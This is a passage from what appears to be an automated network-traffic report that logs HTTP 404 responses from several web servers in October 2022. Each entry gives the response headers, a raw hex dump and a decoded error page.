2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Oct 2022 11:19:42 GMTServer: ApacheContent-Length: 1080Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Oct 2022 11:19:47 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Oct 2022 11:19:49 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Oct 2022 11:19:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Oct 2022 11:19:54 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 26 Oct 2022 11:20:11 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 f4 f3 f7 ec 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 94 82 1d 7b 92 cb c5 12 b6 91 61 1d 87 60 04 5e c4 46 e0 04 89 b7 68 c6 ea bb 95 7f 98 52 35 e2 24 95 25 48 f4 39 50 66 32 b0 7f e9 e1 ac 33 84 c2 bd 57 0e 62 00 b6 2e 43 a6 f4 45 69 2e f0 34 d9 ee 8d 71 ec 62 d0 de 8f d7 a0 e1 5f 80 86 52 8a 69 1a 44 e1 50 14 a6 54 86 9f ad f3 04 9c 46 17 3e 80 23 0c 99 40 07 e8 2a dc c6 c3 70 a4 c0 55 b7 3a 98 0a fe 26 fb 59 8b d3 21 25 7a 7d 40 f3 0d 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eeUAO0fg1k'&11,DL$pgy^w<v~SkV\|mg^K{a`^FhR5$%H9Pf23Wb.CEi.4qb_RiDPTF>#@*pU:&Y!%z}@Y<;0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 26 Oct 2022 11:20:14 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 f4 f3 f7 ec 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 94 82 1d 7b 92 cb c5 12 b6 91 61 1d 87 60 04 5e c4 46 e0 04 89 b7 68 c6 ea bb 95 7f 98 52 35 e2 24 95 25 48 f4 39 50 66 32 b0 7f e9 e1 ac 33 84 c2 bd 57 0e 62 00 b6 2e 43 a6 f4 45 69 2e f0 34 d9 ee 8d 71 ec 62 d0 de 8f d7 a0 e1 5f 80 86 52 8a 69 1a 44 e1 50 14 a6 54 86 9f ad f3 04 9c 46 17 3e 80 23 0c 99 40 07 e8 2a dc c6 c3 70 a4 c0 55 b7 3a 98 0a fe 26 fb 59 8b d3 21 25 7a 7d 40 f3 0d 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eeUAO0fg1k'&11,DL$pgy^w<v~SkV\|mg^K{a`^FhR5$%H9Pf23Wb.CEi.4qb_RiDPTF>#@*pU:&Y!%z}@Y<;0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 26 Oct 2022 11:20:17 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 55 90 41 4f c3 30 0c 85 ef fd 15 66 67 98 07 da 31 8a 04 6b 27 26 95 31 a1 ec c0 31 2c 86 44 ca 92 91 b8 4c fd f7 24 1d 12 70 f4 f3 f7 ec 67 8b ab f6 79 a5 5e 77 1d 3c aa a7 1e 76 fb 87 7e b3 82 d9 0d e2 a6 53 6b c4 56 b5 97 ce dd 7c 81 d8 6d 67 b2 11 96 8f 5e 0a 4b da 94 82 1d 7b 92 cb c5 12 b6 91 61 1d 87 60 04 5e c4 46 e0 04 89 b7 68 c6 ea bb 95 7f 98 52 35 e2 24 95 25 48 f4 39 50 66 32 b0 7f e9 e1 ac 33 84 c2 bd 57 0e 62 00 b6 2e 43 a6 f4 45 69 2e f0 34 d9 ee 8d 71 ec 62 d0 de 8f d7 a0 e1 5f 80 86 52 8a 69 1a 44 e1 50 14 a6 54 86 9f ad f3 04 9c 46 17 3e 80 23 0c 99 40 07 e8 2a dc c6 c3 70 a4 c0 55 b7 3a 98 0a fe 26 fb 59 8b d3 21 25 7a 7d 40 f3 0d 59 3c e4 fe 3b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: eeUAO0fg1k'&11,DL$pgy^w<v~SkV\|mg^K{a`^FhR5$%H9Pf23Wb.CEi.4qb_RiDPTF>#@*pU:&Y!%z}@Y<;0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 26 Oct 2022 11:20:18 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 26 Oct 2022 11:20:24 GMTcontent-type: text/html; charset=UTF-8transfer-encoding: chunkedserver: Apachex-powered-by: PHP/8.0set-cookie: uncode_privacy[consent_types]=%5B%5D; expires=Thu, 26-Oct-2023 11:20:24 GMT; Max-Age=31536000; path=/; SameSite=Strictexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://rahaingoadvice.com/wp-json/>; rel="https://api.w.org/"x-iplb-request-id: 66818F25:C30B_335BECC1:0050_635917F8_3B9C:FC51x-iplb-instance: 32677connection: closeData Raw: 46 31 41 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 74 6f 75 63 68 22 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 61 68 61 69 6e 67 6f 61 64 76 69 63 65 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 39 2e 37 2e 32 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 6e 20 74 72 6f 75 76 c3 a9 65 20 2d 20 c3 89 74 69 65 6e 6e 65 20 52 61 68 61 69 6e 67 6f 6d 61 6e 61 6e 61 20 43 72 6f 75 7a 61 74 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 66 72 5f 46 52 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 6e 20 74 72 6f 75 76 c3 a9 65 20 2d 20 c3 89 74 69 65 6e 6e 65 20 52 61 68 61 69 6e 67 6f 6d 61 6e 61 6e 61 Data Ascii: F1A<!DOCTYPE html><html class="no-touch" lang="fr-FR" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="http://
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 26 Oct 2022 11:20:26 GMTcontent-type: text/html; charset=UTF-8transfer-encoding: chunkedserver: Apachex-powered-by: PHP/8.0set-cookie: uncode_privacy[consent_types]=%5B%5D; expires=Thu, 26-Oct-2023 11:20:26 GMT; Max-Age=31536000; path=/; SameSite=Strictexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://rahaingoadvice.com/wp-json/>; rel="https://api.w.org/"x-iplb-request-id: 66818F25:C30C_335BECC1:0050_635917FA_3CAF:FC51x-iplb-instance: 32677connection: closeData Raw: 39 37 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 74 6f 75 63 68 22 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 72 61 68 61 69 6e 67 6f 61 64 76 69 63 65 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 39 2e 37 2e 32 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 6e 20 74 72 6f 75 76 c3 a9 65 20 2d 20 c3 89 74 69 65 6e 6e 65 20 52 61 68 61 69 6e 67 6f 6d 61 6e 61 6e 61 20 43 72 6f 75 7a 61 74 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 66 72 5f 46 52 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 6e 20 74 72 6f 75 76 c3 a9 65 20 2d 20 c3 89 74 69 65 6e 6e 65 20 52 61 68 61 69 6e 67 6f 6d 61 6e 61 6e 61 Data Ascii: 972<!DOCTYPE html><html class="no-touch" lang="fr-FR" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="http://
